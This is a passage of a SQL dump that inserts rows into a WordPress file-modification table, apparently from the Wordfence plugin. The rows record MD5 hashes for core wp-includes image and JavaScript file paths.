(0x72e95fe8062f99cd48473dcd25973cba, 'wp-includes/images/arrow-pointer-blue-2x.png', 1, 0x00000000000000000000000000000000, 0x431a3e3d7139b7a17b7663c02246445d),
(0x40809ecc98398a23af4cc379280bd0da, 'wp-includes/images/arrow-pointer-blue.png', 1, 0x00000000000000000000000000000000, 0x779ffc62e3ce872a4cabb2c35bbb14f9),
(0xe647c4c50635d840e6e8d9da303795c7, 'wp-includes/images/blank.gif', 1, 0x00000000000000000000000000000000, 0x6d22e4f2d2057c6e8d6fab098e76e80f),
(0x0ecd3e12ff4dd20538b820d9b5add17c, 'wp-includes/images/crystal/archive.png', 1, 0x00000000000000000000000000000000, 0xfbaa067099eb73e2dcecb3f29033e0fa),
(0xf44a1b1427238982724e8430610dc87f, 'wp-includes/images/crystal/audio.png', 1, 0x00000000000000000000000000000000, 0x6b1b3153b950cb7d88b0790445892365),
(0x77a3a4ef4cfdeaa3301e9ceff05d722e, 'wp-includes/images/crystal/code.png', 1, 0x00000000000000000000000000000000, 0x1460ef31b2cffaef1cb012f531ae391f),
(0x94f4a89621deaca9c4dfb3c20cc1ab70, 'wp-includes/images/crystal/default.png', 1, 0x00000000000000000000000000000000, 0xfe5f6af8b942a9ed1d5754b1e0e5ea90),
(0x440c6db70abbbd7a974882c35394efef, 'wp-includes/images/crystal/document.png', 1, 0x00000000000000000000000000000000, 0x5d9bd2b7c1a6de4cd60db260705a0d4a),
(0x6a9097a3c9ff1535462b1fb8afed6f01, 'wp-includes/images/crystal/interactive.png', 1, 0x00000000000000000000000000000000, 0x534872ce342d27be12c21a24a3c960ea),
(0xccc78ab745c17696632ceed8b579535e, 'wp-includes/images/crystal/license.txt', 1, 0x00000000000000000000000000000000, 0xf01b121b601cac57c42110e8d2fc7e32),
(0x5e7fe583c390aff088af2b85797cd008, 'wp-includes/images/crystal/spreadsheet.png', 1, 0x00000000000000000000000000000000, 0xb0b5df1b422cc9300b05604a7a71b06c),
(0xbc18acf0e0c4161fcdef22a652d1c59c, 'wp-includes/images/crystal/text.png', 1, 0x00000000000000000000000000000000, 0x681932d1f666acaa97582ecb22309011),
(0x55c3e5e0240b692275c2ca26cbf4b839, 'wp-includes/images/crystal/video.png', 1, 0x00000000000000000000000000000000, 0x94010edbfd8e6ca589daa4b83bf53d0b),
(0x2aaee42d3310f675ac8d45c25bd54f23, 'wp-includes/images/down_arrow-2x.gif', 1, 0x00000000000000000000000000000000, 0xe52496d9eecd561f7c6d964acb0a5a73),
(0x1d0a9cdf4f825f98ab3b5d2f5e990ce7, 'wp-includes/images/down_arrow.gif', 1, 0x00000000000000000000000000000000, 0x7bbbc00f708a791dc4e674f9e21aa2ca),
(0xd29eb3e5faecc79ff603094b73cdd7d0, 'wp-includes/images/icon-pointer-flag-2x.png', 1, 0x00000000000000000000000000000000, 0xa9e5e1a632f1b3b962e4c426d55acc72),
(0xd65ad7f6097221de8f66d5d11cbe09de, 'wp-includes/images/icon-pointer-flag.png', 1, 0x00000000000000000000000000000000, 0xb0d32c87f2ad8bc2455ebf6a60171027),
(0xd96befdb2f799eb3a9fd9b2689139f47, 'wp-includes/images/rss-2x.png', 1, 0x00000000000000000000000000000000, 0xc71759615ba051c1e6f597fd726a9d11),
(0xdbc872819abcc1b5d8811d3dd4d492e9, 'wp-includes/images/rss.png', 1, 0x00000000000000000000000000000000, 0xa5b05bbf28f294b02efd942a4e5ab806),
(0xd0a27f92ed8eb9827ce18ed1e4d84019, 'wp-includes/images/smilies/icon_arrow.gif', 1, 0x00000000000000000000000000000000, 0x394bffa679f650b7d2f22aa263cc06ba),
(0xefe3afa9e8090e27afe6b6dea88bf756, 'wp-includes/images/smilies/icon_biggrin.gif', 1, 0x00000000000000000000000000000000, 0xf970a6591668c625e4b9dbd3b7a450d7),
(0xb024e5cd9399016212486eae802c002d, 'wp-includes/images/smilies/icon_confused.gif', 1, 0x00000000000000000000000000000000, 0x4affed1b55e5f73c9f0675ae7d0ad823),
(0x582ce745f5436a245f83ac3849a78230, 'wp-includes/images/smilies/icon_cool.gif', 1, 0x00000000000000000000000000000000, 0x25c83ea511f206e88f214719dad9c88c),
(0xc494d4bcfcdd7fd57050885a094890b4, 'wp-includes/images/smilies/icon_cry.gif', 1, 0x00000000000000000000000000000000, 0x7605eca95aaeda46e641745ef6f0e0b0),
(0x215f8d039fe8bcb5703370996ed7d34c, 'wp-includes/images/smilies/icon_eek.gif', 1, 0x00000000000000000000000000000000, 0x52e43743e38a67d5d28845a104ca8c7d),
(0xc2024f6263aeb32220cec7db7c064a28, 'wp-includes/images/smilies/icon_evil.gif', 1, 0x00000000000000000000000000000000, 0x178255bb3fe2c3aa790c1f8ec8738504),
(0x9a4a9e8b42be4754b23b2c6ca3c0540e, 'wp-includes/images/smilies/icon_exclaim.gif', 1, 0x00000000000000000000000000000000, 0xda86bbf377f97d06047aa781a582c52f),
(0xc82275409eb354ac7f8514539bf135f2, 'wp-includes/images/smilies/icon_idea.gif', 1, 0x00000000000000000000000000000000, 0xaaebc9c048367118ba65e1da46bc3e08),
(0x9e20c16e80249b877188ef5e7166b4a7, 'wp-includes/images/smilies/icon_lol.gif', 1, 0x00000000000000000000000000000000, 0xb76e7729d43c4a49182d020741285bef),
(0x8e28a2fb8fd794ef1d57e5681c403d61, 'wp-includes/images/smilies/icon_mad.gif', 1, 0x00000000000000000000000000000000, 0xe4355c00894da1bd78341a6b54d20b56),
(0x1afd5545e47328eeb1f79e231545f670, 'wp-includes/images/smilies/icon_mrgreen.gif', 1, 0x00000000000000000000000000000000, 0x54e8505227edae1e583cf2f9554abc3a),
(0xffc4ea6bb5cb69eed02ebca5b85ca593, 'wp-includes/images/smilies/icon_neutral.gif', 1, 0x00000000000000000000000000000000, 0x4e8b7a51c7f60a2362a4f67fbbc937e7),
(0x9aa58f37b8134d33c29ae3241ccbf48c, 'wp-includes/images/smilies/icon_question.gif', 1, 0x00000000000000000000000000000000, 0x0518596a4eb94c32a2b2ed898bdc3549),
(0xa692affc9e3a5b2662fa5bae6859a9b8, 'wp-includes/images/smilies/icon_razz.gif', 1, 0x00000000000000000000000000000000, 0x7aec68426aa06f01e2b1ac250e5aee62),
(0x24921084f5b330530f0d9872fe02aea9, 'wp-includes/images/smilies/icon_redface.gif', 1, 0x00000000000000000000000000000000, 0xd7e9d095432cbcf09375ffc782c30c23),
(0x89bc421e155d6ec884a838da376798f3, 'wp-includes/images/smilies/icon_rolleyes.gif', 1, 0x00000000000000000000000000000000, 0x19071b1af987946e96dcef6ce0611c6b),
(0xa8488aa3f5c19c5077e015f0253896c0, 'wp-includes/images/smilies/icon_sad.gif', 1, 0x00000000000000000000000000000000, 0x5a50535a06def9d01076772e5e9d235b),
(0x80f706eaff65d8070ee63937e3614a53, 'wp-includes/images/smilies/icon_smile.gif', 1, 0x00000000000000000000000000000000, 0x9ee646ffab71107d1a11407be52f33a5),
(0x3bf1576374d4d3e72a2bf7ac427216ca, 'wp-includes/images/smilies/icon_surprised.gif', 1, 0x00000000000000000000000000000000, 0xae735b5dd659dc4b3b0f249ce59bef79),
(0x878e5c013ae2c3da887fd5ea29672c5c, 'wp-includes/images/smilies/icon_twisted.gif', 1, 0x00000000000000000000000000000000, 0xc9c3d12da1e9da699e490b86d24eee85),
(0x9c3883a98e85a6ace3503561c4a89d09, 'wp-includes/images/smilies/icon_wink.gif', 1, 0x00000000000000000000000000000000, 0xf058206bb8ff732dbe8e7aa10d74c9cd),
(0x7d08c4893d9574a9adf291bb0113a4b9, 'wp-includes/images/toggle-arrow-2x.png', 1, 0x00000000000000000000000000000000, 0x46cae1ca5cf883f4c91243447215ef11),
(0x94dcb55b0fd2b26d258936f253383a44, 'wp-includes/images/toggle-arrow.png', 1, 0x00000000000000000000000000000000, 0x8e9022f98e990584452838f85d77c928),
(0x2fe9b9a0ecc4efceb01f31ca697787a7, 'wp-includes/images/uploader-icons-2x.png', 1, 0x00000000000000000000000000000000, 0xef35cb53941bef570b89317c4fba357c),
(0x5fd6e08134e4813393cdcb13193d8e93, 'wp-includes/images/uploader-icons.png', 1, 0x00000000000000000000000000000000, 0x707b402719c2a935cc7106b1b60bffee),
(0x95688f9789a7914601755165f1aa20ee, 'wp-includes/images/wlw/wp-comments.png', 1, 0x00000000000000000000000000000000, 0x4cc2365d0450dedec30cec2e73a8a1d4),
(0xf6fde58dc0501c712db374f3b9406cca, 'wp-includes/images/wlw/wp-icon.png', 1, 0x00000000000000000000000000000000, 0x311d098eca9a89370877334b1b8f992a),
(0xa7e8e1fab0369190629d67b73e5faa1b, 'wp-includes/images/wlw/wp-watermark.png', 1, 0x00000000000000000000000000000000, 0x708ebef70c64f23294d63347ececebe7),
(0xb30c7ea39ab9ad55f722d0269018d005, 'wp-includes/images/wpicons-2x.png', 1, 0x00000000000000000000000000000000, 0xe7792025943f6c6f219e566bf2f79aa9),
(0x679424475cbeebb13ba972c4c4cf3158, 'wp-includes/images/wpicons.png', 1, 0x00000000000000000000000000000000, 0x90dd81a3ac5697aca79a34a9b1bfa8fa),
(0x3dcc4043c6471a12a891affe51bbdeeb, 'wp-includes/images/wpmini-blue-2x.png', 1, 0x00000000000000000000000000000000, 0x13e7ab1ac2f6c77f177c849576bfdf31),
(0x974d2a6e28e9a4644e1428db8c64309b, 'wp-includes/images/wpmini-blue.png', 1, 0x00000000000000000000000000000000, 0xe8d9359697813d9df251808ec4b58b71),
(0xae0d45f61cc855cf0e9cf8cd84ded91c, 'wp-includes/images/wpspin-2x.gif', 1, 0x00000000000000000000000000000000, 0x450b52bd860e667a0fa3c00b82b58a18),
(0x529678ae344d7040b039750ad68a2070, 'wp-includes/images/wpspin.gif', 1, 0x00000000000000000000000000000000, 0x67f40a30bfa13743e5c4e86bfa467a90),
(0xde4ec45cfc7c0ff3602ab72c19294034, 'wp-includes/images/xit-2x.gif', 1, 0x00000000000000000000000000000000, 0xd9a81fb5a5e21e6d74a5e81ce37b421e),
(0xfafdca0a5cd4fbc9b62e35fa108e9a19, 'wp-includes/images/xit.gif', 1, 0x00000000000000000000000000000000, 0xa815dc7ad6c4175e95bc48f3ab6832e9),
(0x7c2fda92eb005b2a3493ff7805fc01e3, 'wp-includes/js/admin-bar.js', 1, 0x00000000000000000000000000000000, 0x25692c16854d4f5fd7be2ff45a825da9),
(0x4dd0a0009a419faabb3951de2ba0cd08, 'wp-includes/js/admin-bar.min.js', 1, 0x00000000000000000000000000000000, 0x725d72af8994225dc221211cd8120e8e),
(0x5233f0b85573eb33c3c87d54ea9cdbc1, 'wp-includes/js/autosave.js', 1, 0x00000000000000000000000000000000, 0x8a6348b4b6ccb6fdc485912383cddb04),
(0x771075e89a6c7ce50cf570089816ca51, 'wp-includes/js/autosave.min.js', 1, 0x00000000000000000000000000000000, 0xd170f66997bf4dd0a595354633129133),
(0x501c45dbabbd37727c6f49b136fff03e, 'wp-includes/js/backbone.min.js', 1, 0x00000000000000000000000000000000, 0x09622714468a28bca3cac046ee92d8f6),
(0xdbdf0a70a1f11fd3476e750e3aa2b8d3, 'wp-includes/js/colorpicker.js', 1, 0x00000000000000000000000000000000, 0xf01017ca562067f4840eb2b6f99f2daf),
(0x30a4e780c54500308c82108158cf4812, 'wp-includes/js/colorpicker.min.js', 1, 0x00000000000000000000000000000000, 0x3086288f91098c51c719dc0e5874492c),
(0x705579fc6109ea62afe07661843ba138, 'wp-includes/js/comment-reply.js', 1, 0x00000000000000000000000000000000, 0x20ef5771571f1be483869066b2830c2f),
(0x31f9ce588a2fb27436305ed28021dc37, 'wp-includes/js/comment-reply.min.js', 1, 0x00000000000000000000000000000000, 0x82fe85cb67dbd02e20c183e43979f217),
(0x6259c62ca5b0cfa559aa72db9dd13bbe, 'wp-includes/js/crop/cropper.css', 1, 0x00000000000000000000000000000000, 0x6b79350bf46e0f692a4d1b2807ed0399),
(0x0dc32514db11e1e3cf25bc7953fd60f0, 'wp-includes/js/crop/cropper.js', 1, 0x00000000000000000000000000000000, 0x1d97b296d918482e1273c56fbff6a8e2),
(0xa628bc7c056ee495c1b473415246e42b, 'wp-includes/js/crop/marqueeHoriz.gif', 1, 0x00000000000000000000000000000000, 0x8cccae9c1ebafdb83be602e4d44c6f0a),
(0x5ab1001e839c5988b392b320c3a66667, 'wp-includes/js/crop/marqueeVert.gif', 1, 0x00000000000000000000000000000000, 0xae9accf100a4b9930639adff52d4dcc7),
(0xb672815cd96a0694b4a8f2e141241381, 'wp-includes/js/customize-base.js', 1, 0x00000000000000000000000000000000, 0x62f799465f3922f79057f8c1e17f123f),
(0x560a07d5c95560bd5f9a35fa98ad1b38, 'wp-includes/js/customize-base.min.js', 1, 0x00000000000000000000000000000000, 0x05b76950045388239de89bcb4043aa4a),
(0x93567dbb50949cb16d952faf7c492ad9, 'wp-includes/js/customize-loader.js', 1, 0x00000000000000000000000000000000, 0x3e18e99953ef2c5dbe445865119db950),
(0x62e094fb08bf94d28c2026e93f7fac7b, 'wp-includes/js/customize-loader.min.js', 1, 0x00000000000000000000000000000000, 0x4bbf055e4673e39953b716ac908a0abf),
(0xea34cad7e7ba3291160629412e3b34d1, 'wp-includes/js/customize-preview.js', 1, 0x00000000000000000000000000000000, 0x9100940268231265441eeec70eaad488),
(0x3e716cee2baa6d14c80035c4a622865e, 'wp-includes/js/customize-preview.min.js', 1, 0x00000000000000000000000000000000, 0x37964f44f324f359533e4ce7693e0636),
(0xdafd1221a71614287494f2893c0ed4b9, 'wp-includes/js/heartbeat.js', 1, 0x00000000000000000000000000000000, 0x8548d05cee37b20058732f38c6613fe0),
(0x8b6e393790492e4ffad29ddebff0b007, 'wp-includes/js/heartbeat.min.js', 1, 0x00000000000000000000000000000000, 0x9aae6231a46e14ac89912dba8c94625f),
(0x9179df678bed1f7a6155228309584b47, 'wp-includes/js/hoverIntent.js', 1, 0x00000000000000000000000000000000, 0x4502421f188ad9e38079741edc36e118),
(0x532e46c8ab41be7f6aaeffe428a03a05, 'wp-includes/js/hoverIntent.min.js', 1, 0x00000000000000000000000000000000, 0x6f0074f1f2d119430222bc3c0950ac2f),
(0x069397ac256251f1a3931b624d3cd678, 'wp-includes/js/imgareaselect/border-anim-h.gif', 1, 0x00000000000000000000000000000000, 0x5ac3c42cc86e745a5e36b67b4c70a134),
(0x8bba46e822f7e87668e2a1244c628e8d, 'wp-includes/js/imgareaselect/border-anim-v.gif', 1, 0x00000000000000000000000000000000, 0x20c97a21993cf137ead9fdbecbc42aa8),
(0x3c46e90febef507acc193232a387127e, 'wp-includes/js/imgareaselect/imgareaselect.css', 1, 0x00000000000000000000000000000000, 0x7d28cad92829b3d633a087b5f3b595af),
(0xd8382f42b18f24389088cf1e04606d9c, 'wp-includes/js/imgareaselect/jquery.imgareaselect.js', 1, 0x00000000000000000000000000000000, 0x55a6b7fb4b1b287497d3fc30910e97ce),
(0xd5f6bcfacda436e9002ffd936bfac0f4, 'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js', 1, 0x00000000000000000000000000000000, 0x0030d4ba4c429d776d23c2e37775873a),
(0x53582b37cafb081e311d3fc5f5cfee2d, 'wp-includes/js/jcrop/Jcrop.gif', 1, 0x00000000000000000000000000000000, 0x5a8bfd37651305bdafbcf2cd51b0254b),
(0xfc678d229a107d5fbf37b8bda6dc4a35, 'wp-includes/js/jcrop/jquery.Jcrop.min.css', 1, 0x00000000000000000000000000000000, 0x56cc9ea201dc2f4b910e78bfacac9211),
(0x54872e6f40cea832ff77f5768e9f58b9, 'wp-includes/js/jcrop/jquery.Jcrop.min.js', 1, 0x00000000000000000000000000000000, 0x2f61ab984c177275c71e34ff1a17c102),
(0x76a19610020cdea303e3fb1d7f5211ef, 'wp-includes/js/jquery/jquery-migrate.js', 1, 0x00000000000000000000000000000000, 0x90e237d5f01035b958feaf514ef27f7a),
(0xba61c9406f9bff27bfc96b62edfe0ef9, 'wp-includes/js/jquery/jquery-migrate.min.js', 1, 0x00000000000000000000000000000000, 0x512b871a2830e44259bc3ce3343afcd0),
(0xc4e0ca99007df4dfe794a04b9bf62eff, 'wp-includes/js/jquery/jquery.color.min.js', 1, 0x00000000000000000000000000000000, 0xff2db8dbf145ce47f31781eef33e764a),
(0x76fad2b8293b8f44b08d7e4a22e08f71, 'wp-includes/js/jquery/jquery.form.js', 1, 0x00000000000000000000000000000000, 0xe5afd8e41d2ec22c19932b068cd90a71),
(0x263d1a10bd2b747fed9222a22f6b270a, 'wp-includes/js/jquery/jquery.form.min.js', 1, 0x00000000000000000000000000000000, 0xdbc3808473def00fce45fe564dc72dcb),
(0x9cfe501a8dc52fe904a203af6c0e25a1, 'wp-includes/js/jquery/jquery.hotkeys.js', 1, 0x00000000000000000000000000000000, 0xa7ad102b68229e728863325d0efec72e),
(0xc5cd2d8670936c45c6f3d86b86112ff6, 'wp-includes/js/jquery/jquery.hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe353217d4555ab5c62b367be6889813d),
(0x6723e92c764d91ff8e8b97df3a0cf5e4, 'wp-includes/js/jquery/jquery.js', 1, 0x00000000000000000000000000000000, 0x92c9ccfa9216499d48ecc11e6d9887d5),
(0x632cbd85b05b78deabf433a5060af940, 'wp-includes/js/jquery/jquery.masonry.min.js', 1, 0x00000000000000000000000000000000, 0xfc2d7669d58e909815f1994047bf671c),
(0x7b9f1f29d734653402703ab106665787, 'wp-includes/js/jquery/jquery.query.js', 1, 0x00000000000000000000000000000000, 0x3bcc587af2c7b01fc6fbc9c077050143),
(0x281588d4672500cfc334dddb6c3e9c8d, 'wp-includes/js/jquery/jquery.schedule.js', 1, 0x00000000000000000000000000000000, 0x0426b39754aa6bc766d89ea4c41bbd06),
(0x7168ff36361f3597797cf23def3f5309, 'wp-includes/js/jquery/jquery.serialize-object.js', 1, 0x00000000000000000000000000000000, 0xd15c29a18d9ffa8b9b4ae86c3c0cfa22),
(0xfc303c5073c9f1d79e480f97d1c13232, 'wp-includes/js/jquery/jquery.table-hotkeys.js', 1, 0x00000000000000000000000000000000, 0xbaa8747ae1cb2d15755733fa4f96f1b7),
(0xf2b1a0adfc1fb242c95204d47a878759, 'wp-includes/js/jquery/jquery.table-hotkeys.min.js', 1, 0x00000000000000000000000000000000, 0xe56f81676f199db7bf937e69a64909fa),
(0x6d59b7c118939a0c7d10c9bdeb0b853f, 'wp-includes/js/jquery/jquery.ui.touch-punch.js', 1, 0x00000000000000000000000000000000, 0x4cc86d1003c45134d6838f13e3885db1),
(0xc6ac2b1a96bcca1f49f3645e69203c00, 'wp-includes/js/jquery/suggest.js', 1, 0x00000000000000000000000000000000, 0x9044d9d8599a013f7c0ca8120501c188),
(0x821133a496c6876515c728c3ba39f911, 'wp-includes/js/jquery/suggest.min.js', 1, 0x00000000000000000000000000000000, 0x67bea18c057fd6c257d08e55a1090708),
(0x467b483c1a2afa0ca3aa9b9ad51189d3, 'wp-includes/js/jquery/ui/jquery.ui.accordion.min.js', 1, 0x00000000000000000000000000000000, 0x1da489eb8b596be7a49f1be959249988),
(0x836189ad6294310f694cae1965a2c4b9, 'wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js', 1, 0x00000000000000000000000000000000, 0xc6c4d43ac586574589a0ec4542a890a8),
(0xe38c116811865364ac7bec791ebd5366, 'wp-includes/js/jquery/ui/jquery.ui.button.min.js', 1, 0x00000000000000000000000000000000, 0x1cc433c88d349c513c801378c4493f19),
(0x7a52332e877b2f2476e6bea26ebb38e2, 'wp-includes/js/jquery/ui/jquery.ui.core.min.js', 1, 0x00000000000000000000000000000000, 0x739cf68f21c10e04cde3ad13fcff9063),
(0x1b29001226e1c84658d636ad2697ce4c, 'wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js', 1, 0x00000000000000000000000000000000, 0x4eac58ed8deb3189c8d05bab9187f1ce),
(0x7e86d4e48e10f9bc201a56ccf5a96e42, 'wp-includes/js/jquery/ui/jquery.ui.dialog.min.js', 1, 0x00000000000000000000000000000000, 0x3248497acc4c9a3eae7d094860937708),
(0x257d76949be29d5ba015f04bb057ff16, 'wp-includes/js/jquery/ui/jquery.ui.draggable.min.js', 1, 0x00000000000000000000000000000000, 0x67b603ea0e4abe708f871111fcf45738),
(0x5b7f42af625160f8929acefc7739afab, 'wp-includes/js/jquery/ui/jquery.ui.droppable.min.js', 1, 0x00000000000000000000000000000000, 0x79ea08a1eb866ba2039cc617ada702de),
(0xa2eb3defe63453330c8aea1c0bd10f79, 'wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js', 1, 0x00000000000000000000000000000000, 0x625c5e7376d305ce4a11fd1277de5734),
(0x95230d31915a3a67e77114220e84abdc, 'wp-includes/js/jquery/ui/jquery.ui.effect-bounce.min.js', 1, 0x00000000000000000000000000000000, 0x81ee7ab27ed9b0f3556a406ff6aad80b),
(0x7a943308a8342a79fdbdbde5d4821f9f, 'wp-includes/js/jquery/ui/jquery.ui.effect-clip.min.js', 1, 0x00000000000000000000000000000000, 0x71a13d33f3fc7de23f13adcc4593a5a2),
(0x80b2becab7f6c8ce2cc4906d2519d6f1, 'wp-includes/js/jquery/ui/jquery.ui.effect-drop.min.js', 1, 0x00000000000000000000000000000000, 0x1d045fd3777c8376972022e868891b86),
(0xdbfefc95dee7a5497718bb2b4298cc65, 'wp-includes/js/jquery/ui/jquery.ui.effect-explode.min.js', 1, 0x00000000000000000000000000000000, 0x3ae92de7419e58815544147641a87930),
(0xd1d5ca6cc05c5668fc9186a7ef803b40, 'wp-includes/js/jquery/ui/jquery.ui.effect-fade.min.js', 1, 0x00000000000000000000000000000000, 0x79debe8459f8ceca8443086bf29e16a0),
(0x65b1db62ce2c8e584c9d75ae8d9b48bf, 'wp-includes/js/jquery/ui/jquery.ui.effect-fold.min.js', 1, 0x00000000000000000000000000000000, 0xf8cda9cadd854d552cc429d799274962),
(0x4b0053d08c7a51cd32d305478b436db7, 'wp-includes/js/jquery/ui/jquery.ui.effect-highlight.min.js', 1, 0x00000000000000000000000000000000, 0x15b8d390675cf17bc3a73c3619557fb4),
(0xe61e2e89ed5d14ce7a6f5f577e6274dd, 'wp-includes/js/jquery/ui/jquery.ui.effect-pulsate.min.js', 1, 0x00000000000000000000000000000000, 0x3d639b4c14c1f6b080f746b7250554c3),
(0xecbb0f887853be02be5d92449dabab09, 'wp-includes/js/jquery/ui/jquery.ui.effect-scale.min.js', 1, 0x00000000000000000000000000000000, 0x783b0ad56b1a8a97b76079a1d41c6f88),
(0x7d0e1961f38302fbcc8ea56ffae5bdfd, 'wp-includes/js/jquery/ui/jquery.ui.effect-shake.min.js', 1, 0x00000000000000000000000000000000, 0x782fbb6948781cffd80ddf4030196952),
(0x67e9e9394bc3e929aab3642f37083f4c, 'wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js', 1, 0x00000000000000000000000000000000, 0x945300af618d04041dc49a0a5d36a917),
(0xb51ab4d9c576540c299246c08a3f1f33, 'wp-includes/js/jquery/ui/jquery.ui.effect-transfer.min.js', 1, 0x00000000000000000000000000000000, 0xe91b94a47085eac01afbf48c8cd515f0),
(0x754b80119b6e3ea944a8729fcb20e008, 'wp-includes/js/jquery/ui/jquery.ui.effect.min.js', 1, 0x00000000000000000000000000000000, 0xea7d13d6d2212ba59159c40b2a57bd3b),
(0x58871c952188fc9209380c1da5e2fba6, 'wp-includes/js/jquery/ui/jquery.ui.menu.min.js', 1, 0x00000000000000000000000000000000, 0xe0b94d0041ca790b68af39edf821d238),
(0xfc86fd927ab29ffccd9b8f006b1c16ef, 'wp-includes/js/jquery/ui/jquery.ui.mouse.min.js', 1, 0x00000000000000000000000000000000, 0x513bb6d79ab29c58ab1b32646216a3a0),
(0xb774075517c3648a43008ea3908d1def, 'wp-includes/js/jquery/ui/jquery.ui.position.min.js', 1, 0x00000000000000000000000000000000, 0xeb63c3d2dace62e102af74004ccd0ff1),
(0xed6c8caaadf107980aabd9a2d652c224, 'wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js', 1, 0x00000000000000000000000000000000, 0x35086553121b0423a8f2eaaedca79152),
(0xbc7841b4992e6c81967c4f88d0354baf, 'wp-includes/js/jquery/ui/jquery.ui.resizable.min.js', 1, 0x00000000000000000000000000000000, 0x1cca9d1d61a8a9bef77cfea0f39e793d),
(0x9f9bb7f7971fd1af5bd58de0ef6e3889, 'wp-includes/js/jquery/ui/jquery.ui.selectable.min.js', 1, 0x00000000000000000000000000000000, 0x6908d69d10dae3d04c23ca83a884ba6f),
(0x5e2cdc406e16cca524880919b326d720, 'wp-includes/js/jquery/ui/jquery.ui.slider.min.js', 1, 0x00000000000000000000000000000000, 0xf1b234712eabc4fea71eaadcf2e73ffa),
(0x4fef3388851d7d8050f3761eb12f35d5, 'wp-includes/js/jquery/ui/jquery.ui.sortable.min.js', 1, 0x00000000000000000000000000000000, 0xcccbd3de04d2ff8cd30164925353c394),
(0x615a91d1c6c560ec2015d7fd796124bc, 'wp-includes/js/jquery/ui/jquery.ui.spinner.min.js', 1, 0x00000000000000000000000000000000, 0xab6ea5b371afc02315dfaa7dfd4a1063),
(0x0af57c8d73eca8539aabad9d17884e0a, 'wp-includes/js/jquery/ui/jquery.ui.tabs.min.js', 1, 0x00000000000000000000000000000000, 0x3d531a65189ab04b164e9ac6ff708c06),
(0x65d61c5c106626d6a63abd7b2359e7b0, 'wp-includes/js/jquery/ui/jquery.ui.tooltip.min.js', 1, 0x00000000000000000000000000000000, 0x4fbdb31340b01c249a0fe5112e0eeec9),
(0x4a0ce1b71c479c6d5b7b6642e52b7791, 'wp-includes/js/jquery/ui/jquery.ui.widget.min.js', 1, 0x00000000000000000000000000000000, 0x2425a542e6dde093dd85ac0b5adc0141),
(0x2ae7101a3037d1a5314f81d3d3d98e38, 'wp-includes/js/json2.js', 1, 0x00000000000000000000000000000000, 0x74d903049683e5bbea9ccb7544a42bca),
(0xfdb4f6d7f8f529dd28a4d03c1f07d9dd, 'wp-includes/js/json2.min.js', 1, 0x00000000000000000000000000000000, 0xef4188cb0b60a72017f4c8a1e840ab1e),
(0x72e9f6107287284aaf67f728a879ad74, 'wp-includes/js/mce-view.js', 1, 0x00000000000000000000000000000000, 0x09f646383af1481207855a1eaf2d8f16),
(0xee1417890b9566d92575df50fbcaf184, 'wp-includes/js/mce-view.min.js', 1, 0x00000000000000000000000000000000, 0x40092f2fbf830be89b8c4db99c9008b0),
(0xf575f481034e90e21d832e415fd95fcf, 'wp-includes/js/media-editor.js', 1, 0x00000000000000000000000000000000, 0xc2c48681543e79a94bb97052b2515b8e),
(0x092cb9a92fd595188b21e79b6779fe64, 'wp-includes/js/media-editor.min.js', 1, 0x00000000000000000000000000000000, 0xbb3a5f53c1a46e2ae27667e82c582f79),
(0x10298f9f0c5fe6f6924aaf87d71d99d4, 'wp-includes/js/media-models.js', 1, 0x00000000000000000000000000000000, 0x0c065b544bad77fbc55a68561cf67055),
(0x82468920e5474aced642ec7f887337b5, 'wp-includes/js/media-models.min.js', 1, 0x00000000000000000000000000000000, 0xdef5272789e7da0fd60524d1ebf96a98),
(0x81c889563f09dd13de1701135dc62941, 'wp-includes/js/media-views.js', 1, 0x00000000000000000000000000000000, 0x8f9b3fcd0c47b1ba4bf54a1ed2989dd6),
(0x96c1bc0b9945983fc61d8cd0aee1bea0, 'wp-includes/js/media-views.min.js', 1, 0x00000000000000000000000000000000, 0xb2517aad471230737b19eca7939536c6),
(0x8af1ec369264f513a27813c71144c9d1, 'wp-includes/js/mediaelement/background.png', 1, 0x00000000000000000000000000000000, 0x703c659e4bf563a05c6338a1727e006c),
(0x1ab1650dd6f3e46a215eb20cb809e3f7, 'wp-includes/js/mediaelement/bigplay.png', 1, 0x00000000000000000000000000000000, 0x716436fb3df0d29e6b37dd62d952676a),
(0x37b5d84f2bb2bb1bbe0f978ac78b276e, 'wp-includes/js/mediaelement/bigplay.svg', 1, 0x00000000000000000000000000000000, 0xd71b376560d2d95d10a4017a2178d0d5),
(0xc1ea3595ec5b2c096ac42810eac6aab6, 'wp-includes/js/mediaelement/controls.png', 1, 0x00000000000000000000000000000000, 0x24a0227fbdd3acfd86ff03fc3fc6c8a4),
(0x4771dc4001affc02ddd3676de5b1aa16, 'wp-includes/js/mediaelement/controls.svg', 1, 0x00000000000000000000000000000000, 0x40f56f5a736da4effeb790cedb8a52f0),
(0x7b07c3ea9961e99d74d10a223eaac753, 'wp-includes/js/mediaelement/flashmediaelement.swf', 1, 0x00000000000000000000000000000000, 0x03dc1336e5697e4ceda3a7f4b99b71c7),
(0xe99c272018adc6237388fe19dfbe557c, 'wp-includes/js/mediaelement/loading.gif', 1, 0x00000000000000000000000000000000, 0x76b326f4d44222126fee21076595bef5),
(0x1ba779b4ddda0821a100705ae8885b41, 'wp-includes/js/mediaelement/mediaelement-and-player.min.js', 1, 0x00000000000000000000000000000000, 0x9075ef6303cc251092a0d6bfdd3a2093),
(0x09073fb1cfe486e6db0819997199754d, 'wp-includes/js/mediaelement/mediaelementplayer.min.css', 1, 0x00000000000000000000000000000000, 0xa7f7bdc09331cf77b0f7b820eb59f75b);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x0f3b8826059c6e62b1cb1969ded9b7a9, 'wp-includes/js/mediaelement/silverlightmediaelement.xap', 1, 0x00000000000000000000000000000000, 0x2fb1bc1a7f10d1dd54689a79b4cf53ac),
(0xad9d9a9553c768deebe153d025547af8, 'wp-includes/js/mediaelement/wp-mediaelement.css', 1, 0x00000000000000000000000000000000, 0xb84abcd93646dedd34ab5c0fe7ffd284),
(0xfb4481cf10e1ea5de69f7cdfbcaa2499, 'wp-includes/js/mediaelement/wp-mediaelement.js', 1, 0x00000000000000000000000000000000, 0x4e654df64f6c6971d29676c04eb5481a),
